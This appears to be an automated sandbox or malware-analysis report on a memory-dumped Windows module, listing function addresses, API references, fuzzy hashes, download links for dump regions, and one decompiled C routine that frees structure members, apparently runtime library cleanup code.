0x6d4c89bd
0x6d4c89c6
0x6d4c89c9
0x6d4c89cb
0x6d4c89d6
0x6d4c89d8
0x6d4c89e2
0x6d4c89e2
0x6d4c89e4
0x6d4c89e6
0x00000000
0x00000000
0x6d4c89dd
0x6d4c89df
0x6d4c89e1
0x6d4c89e1
0x00000000
0x6d4c89e1
0x00000000
0x6d4c89df
0x6d4c89e2
0x6d4c89c9
0x6d4c89e8
0x6d4c89e8
0x6d4c89ea
0x6d4c89ee
0x6d4c89ee
0x6d4c89f3
0x6d4c89f5
0x6d4c89f8
0x6d4c89fb
0x6d4c89fd
0x6d4c8a00
0x6d4c8a18
0x6d4c8a1b
0x6d4c8a1e
0x6d4c8a26
0x6d4c8a2b
0x6d4c8a30
0x00000000
0x6d4c8a30
0x6d4c8a02
0x6d4c8a07
0x6d4c8a0a
0x6d4c8a0f
0x6d4c8a12
0x6d4c8a14
0x00000000
0x00000000
0x6d4c8a16
0x6d4c8963
0x00000000
0x6d4c894a
0x6d4c88bd
0x6d4c88bd
0x6d4c88bf
0x6d4c88c1
0x6d4c88c1
0x6d4c88c5
0x00000000
0x00000000
0x6d4c88c9
0x6d4c88dd
0x6d4c88dd
0x6d4c88cb
0x6d4c88cb
0x6d4c88cb
0x6d4c88d1
0x00000000
0x6d4c88d3
0x6d4c88d3
0x6d4c88d6
0x6d4c88db
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4c88db
0x6d4c88d1
0x6d4c88e6
0x6d4c88e8
0x6d4c8a37
0x6d4c8a37
0x6d4c88ee
0x6d4c88ee
0x00000000
0x6d4c88ee
0x00000000
0x6d4c88e8
0x6d4c88e1
0x6d4c88e3
0x6d4c88e3
0x00000000
0x6d4c88e3
0x6d4c88bb
0x00000000

APIs

_free.LIBCMT ref: 6D4C88F2
_free.LIBCMT ref: 6D4C8916
_free.LIBCMT ref: 6D4C8A9D
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 89d85292121b5c684419694fe681a9e40587605446b2111b94a54c8044ec43b1
Instruction ID: 919b703ca97fa5f29b14318156a3eb085a2b0109bd7dabcb1f97c2eb38637080
Opcode Fuzzy Hash: 89d85292121b5c684419694fe681a9e40587605446b2111b94a54c8044ec43b1
Instruction Fuzzy Hash: E6C128799082069FDB15DF79C840FAE7BB8AF42314F2541AEE59497341E7318E41CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D00FC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6D4D0242

Strings

1#SNAN, xrefs: 6D4D1441
1#QNAN, xrefs: 6D4D1448
1#INF, xrefs: 6D4D144F
1#IND, xrefs: 6D4D143A

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7da8e300cbaa8a273741d4c33e88552e785267ea3b741fc0c7759015f5c05bca
Instruction ID: 944633a6bbfe9b9b1fde980473273ca62dbb2363a2814da54096101596629363
Opcode Fuzzy Hash: 7da8e300cbaa8a273741d4c33e88552e785267ea3b741fc0c7759015f5c05bca
Instruction Fuzzy Hash: 26C28E71E086298FDBA5CE29CD50BEAB7B5FB45304F2541EAD84DE7240E774AE818F40

Uniqueness

Uniqueness Score: -1.00%

Function 6D456B50, Relevance: 4.9, APIs: 3, Instructions: 351COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 6D456C7E
_swprintf.LIBCMT ref: 6D456E4E

Part of subcall function 6D458EC0: _strcspn.LIBCMT ref: 6D458F61
Part of subcall function 6D458EC0: _strcspn.LIBCMT ref: 6D458F83

_swprintf.LIBCMT ref: 6D456F33

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _swprintf$_strcspn
String ID:
API String ID: 2693443874-0
Opcode ID: 6b4d4e9138f4d2648d0fc145d8a9b54e9dbedb170afdf09b64cedacfca26e09c
Instruction ID: 44bdcfbb5b2df845e6a7784dfe697427f96da6f22c3b424c20cbc7f726c12423
Opcode Fuzzy Hash: 6b4d4e9138f4d2648d0fc145d8a9b54e9dbedb170afdf09b64cedacfca26e09c
Instruction Fuzzy Hash: EFD18D71E10209ABDF05DFA8DC44FAEBBB9FF49314F104229F910AB290D735A965CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B3EDA, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000001), ref: 6D4B3FD2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000001), ref: 6D4B3FDC
UnhandledExceptionFilter.KERNEL32(6D478CFA,?,?,?,?,?,00000001), ref: 6D4B3FE9

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d6773dd7cc69bbcb7cf4f345ee84671bc654b91cb66463ea01cda6a15d611972
Instruction ID: cd2e0200362100516e66bf70fd4938679b4b61cbe588f2580bda20d9f7015413
Opcode Fuzzy Hash: d6773dd7cc69bbcb7cf4f345ee84671bc654b91cb66463ea01cda6a15d611972
Instruction Fuzzy Hash: 3331D47590121DABCB21DF29D888B9DBBB8BF08354F5141DAE41DAB250EB709F818F94

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BAD71, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002,00000000,?,6D4B5C5E,00000003), ref: 6D4BAD92
TerminateProcess.KERNEL32(00000000,?,6D4BAD47,00000003,6D532230,0000000C,6D4BAE8C,00000003,00000002,00000000,?,6D4B5C5E,00000003), ref: 6D4BAD99
ExitProcess.KERNEL32 ref: 6D4BADAB

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: be554e91378462fecd0d5424c98b78f0cdd03c1294d5cb560719e10c479df906
Instruction ID: 2e9ffcc103f5ac1e4f4b3a173c6e053a36792f042b6e40bbf1d5bd6de7052253
Opcode Fuzzy Hash: be554e91378462fecd0d5424c98b78f0cdd03c1294d5cb560719e10c479df906
Instruction Fuzzy Hash: 0DE08C31400249AFCF02AF69CD0AF6D3B7AEF25246F02441DFA048B921DB75DD52DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C4A8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6D4BE211,?,00000004), ref: 6D4C4ADD

Strings

GetLocaleInfoEx, xrefs: 6D4C4A9B, 6D4C4AA5

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: dfed0d66167008bea7d61286ffc1fa836c57f5439ab45d523c7d619763544c2a
Instruction ID: 5b54def99b2597065185d56c4e7634a97b62794902572c910bec64489850ac71
Opcode Fuzzy Hash: dfed0d66167008bea7d61286ffc1fa836c57f5439ab45d523c7d619763544c2a
Instruction Fuzzy Hash: F8F09036A04118BBCF159F65CD04F7E7B65EF0D751F024119BE086A640DB32AE21A7D6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A6B40, Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a2e6ed2bc696b369ee416cf9f0dd87540bcb7678acac9b2b4fff68d87581b84
Instruction ID: 853f8bc37af96296e76800f01781b70969991b3a07aacf7292565e4779880900
Opcode Fuzzy Hash: 5a2e6ed2bc696b369ee416cf9f0dd87540bcb7678acac9b2b4fff68d87581b84
Instruction Fuzzy Hash: 2E023D71E046199FDF14CFADC890AAEB7F1EF58314F298169E915E7388D731AE418B80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4906EF, Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D4915DB
IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 6D4915FA

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8FeaturePresentProcessorThrow
String ID:
API String ID: 2073180564-0
Opcode ID: a25b244c07bed7e209dc89f79f8326d8d6f5fa6aa37ecb1d4755e116c8667888
Instruction ID: 690d0f2c9140be58a2a73e7df4e6311419e0c182298df40398596509b997bbff
Opcode Fuzzy Hash: a25b244c07bed7e209dc89f79f8326d8d6f5fa6aa37ecb1d4755e116c8667888
Instruction Fuzzy Hash: B1517CB1D0420A9BDF05CF6AD881BAABBF8FB55314F25816AD815EB250D371DD40CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D465590, Relevance: 1.9, APIs: 1, Instructions: 388COMMON

Download Yara Rule

APIs

__Tolower.LIBCPMT ref: 6D465725

Part of subcall function 6D479071: std::regex_error::regex_error.LIBCPMT ref: 6D47907D
Part of subcall function 6D479071: __CxxThrowException@8.LIBVCRUNTIME ref: 6D47908B

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8ThrowTolowerstd::regex_error::regex_error
String ID:
API String ID: 2991004702-0
Opcode ID: d0bfc306d263d91bc25765f651e4ab8e731013c242de232be25237aa95bfa750
Instruction ID: ef713388e56594fa613eaf60e752661e91e6a2aed0aeab044e8538418d85e60f
Opcode Fuzzy Hash: d0bfc306d263d91bc25765f651e4ab8e731013c242de232be25237aa95bfa750
Instruction Fuzzy Hash: 0FE1A9B0A18686DFCB05CF28C490EBAB7B2BF45304F648159D9169B796C731EC65CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3507, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D4C3502,?,?,00000008,?,?,6D4D1F3E,00000000), ref: 6D4C3734

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 770d0f7a40d1d1490d88c232f4e8e0e2a0c0fe7a7bc2d21722c42fef3b0d3230
Instruction ID: 892d6499abbca68c3754ea2036a10cb389c191a2e631fbabf33870e7841f8b61
Opcode Fuzzy Hash: 770d0f7a40d1d1490d88c232f4e8e0e2a0c0fe7a7bc2d21722c42fef3b0d3230
Instruction Fuzzy Hash: 38B148796106099FDB15CF28C48AB647BA0FF45364F25C658E8A9CF3A1C335ED92CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6D4695D0, Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

Remem, xrefs: 6D4695E4

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Remem
API String ID: 0-3817846515
Opcode ID: de922cbabfab31d16fadaf76ef89cdaf03647586ca53d093c1c0c42671c3bddf
Instruction ID: 5c1d667e89cb345dc4a216447ebdd1f78c81e6162a7b600f1a495b4b0244881f
Opcode Fuzzy Hash: de922cbabfab31d16fadaf76ef89cdaf03647586ca53d093c1c0c42671c3bddf
Instruction Fuzzy Hash: 09C19C74614686DFDB09CF28C490FAAB7B2FF45314F208159D9528B384D7B2EC66CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C40B9, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 6D4B472E: EnterCriticalSection.KERNEL32(-6D540297,?,6D4BA9B3,00000000,6D5321F0,0000000C,6D4BA96E,6D4D78BF,?,?,6D4BF5BF,6D4D78BF,?,6D4BDF0C,00000001,00000364), ref: 6D4B473D

EnumSystemLocalesW.KERNEL32(6D4C4073,00000001,6D532500,0000000C), ref: 6D4C40F1

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 590933a85a281de026e535e44b862ed0d497fe03fe72566161558e81e22d57e2
Instruction ID: 302d2d95b770d6d5545ee52dee7cabde84de4dba815c4baf06ddae23393c908f
Opcode Fuzzy Hash: 590933a85a281de026e535e44b862ed0d497fe03fe72566161558e81e22d57e2
Instruction Fuzzy Hash: CEF03C76A10200DFDF14DF69C904F5D7BB0AB19326F12425EF554DF691DB354940CB86

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B05A8, Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 6D4B0718

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 01f85f18f27bf4184f1ca7152c2daebaf1fa6198a417cb890589fea4ebca3181
Instruction ID: fe751d82cc2d3eaa59171571fde4dea281a50869d07665c0822eace4e7290548
Opcode Fuzzy Hash: 01f85f18f27bf4184f1ca7152c2daebaf1fa6198a417cb890589fea4ebca3181
Instruction Fuzzy Hash: 85519D602487464FDF11C96A8752FBE7395EBB3306F28090DDA82C7781DA35DD4287B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BA02F, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca90f7f58269b43f473d793a456f73c082414fa599ded321f241b7d1a44d3c10
Instruction ID: c813dc8b87c8bec6ae267c558dfc73488964c2f685a4a604e54e6967c5d5c8a5
Opcode Fuzzy Hash: ca90f7f58269b43f473d793a456f73c082414fa599ded321f241b7d1a44d3c10
Instruction Fuzzy Hash: 7E329E74A0420ADFCB18CFA8C992EBEB7B5FF55308F254168D94197304D772AE56CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C6EC9, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87f54d508bc2c0b76caf0c73fd367f8c74ce3d32688c29635b2aadfa06bc8cfa
Instruction ID: 5a2e52a43b8763bb4e1d7157cfe17c58677411ddbf46c05e0444c90333e8c6bf
Opcode Fuzzy Hash: 87f54d508bc2c0b76caf0c73fd367f8c74ce3d32688c29635b2aadfa06bc8cfa
Instruction Fuzzy Hash: 94322936E29F014EDB239534C861335A25CAFB73D4F25D72BE819B5E9AEF28C8834141

Uniqueness

Uniqueness Score: -1.00%

Function 6D4641B0, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92d91e0d336d2e97557e1d538d06bbd8dd538284310e72fb5a340ef5d5893959
Instruction ID: 6ebb5bfc6e94f779ecaeb7a468f6f0690fbc18278aa060b2d2725aa13800a5a3
Opcode Fuzzy Hash: 92d91e0d336d2e97557e1d538d06bbd8dd538284310e72fb5a340ef5d5893959
Instruction Fuzzy Hash: E751F77271825B8BDB05CEDCC8A09A973A1BB897C0F65423DE91BDB744D630ED46C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 6D494D40, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: a4e6c7eaef975d984c555cabab073d2f44a6ed884fa5eb95e117bf801f4ebae4
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 8911087F2410C343D300896FC8B4EB7AF99FACE2A5739436AD0798FB58D22399559608

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CBC30(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x2afffffb
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x6d5340c8) {
					_t3 = _t74 + 0x7c; // 0x500d8b6d
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x64958bc1
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E6D4C02CE(_t46);
							_t5 = _t74 + 0x88; // 0x2afffffb
							E6D4CBF44( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x8a6d534a
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E6D4C02CE(_t47);
							_t7 = _t74 + 0x88; // 0x2afffffb
							E6D4CC438( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x500d8b6d
						E6D4C02CE( *_t8);
						_t9 = _t74 + 0x88; // 0x2afffffb
						E6D4C02CE( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0x22a04c2
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0xfffb8785
					E6D4C02CE( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0xc3d81ff
					E6D4C02CE( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x266d534a
					E6D4C02CE( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0x22a04c2
					E6D4C02CE( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0x88000016
				E6D4CBDA3( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x6d4d795f
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x6d4d78e7
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6d5342b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6D4C02CE(_t31);
							E6D4C02CE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x3afffffb
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6D4C02CE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6D4C02CE(_t74);
			}

0x6d4cbc38
0x6d4cbc3c
0x6d4cbc3c
0x6d4cbc44
0x6d4cbc4d
0x6d4cbc4d
0x6d4cbc52
0x6d4cbc59
0x6d4cbc59
0x6d4cbc61
0x6d4cbc69
0x6d4cbc6e
0x6d4cbc74
0x6d4cbc7a
0x6d4cbc7b
0x6d4cbc7b
0x6d4cbc83
0x6d4cbc8b
0x6d4cbc90
0x6d4cbc96
0x6d4cbc9c
0x6d4cbc9d
0x6d4cbca0
0x6d4cbca5
0x6d4cbcab
0x6d4cbcb1
0x6d4cbc52
0x6d4cbcb2
0x6d4cbcb2
0x6d4cbcba
0x6d4cbcc1
0x6d4cbccd
0x6d4cbcd2
0x6d4cbce0
0x6d4cbce5
0x6d4cbcee
0x6d4cbcf3
0x6d4cbcf9
0x6d4cbcfe
0x6d4cbd01
0x6d4cbd07
0x6d4cbd0f
0x6d4cbd10
